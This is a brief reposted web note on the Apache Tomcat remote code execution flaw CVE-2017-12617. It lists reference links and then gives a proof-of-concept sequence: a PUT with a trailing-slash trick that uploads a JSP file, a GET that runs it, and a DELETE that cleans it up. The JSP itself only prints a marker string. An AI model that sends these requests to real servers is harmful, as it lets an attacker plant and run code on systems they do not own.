Apache Tomcat RCE if readonly set to false (CVE-2017-12617)

来源:互联网 发布:光电转换器淘宝网 编辑:程序博客网 时间:2024/06/05 18:59
  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
  2. https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
  3. https://www.exploit-db.com/exploits/43008/
  4. https://www.exploit-db.com/exploits/42966/
1.
PUT http://localhost:8080/test.jsp/
content-type: text/plain
{
    <% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>
}


2.
GET http://localhost:8080/test.jsp


3.
DELETE http://localhost:8080/test.jsp/ HTTP/1.1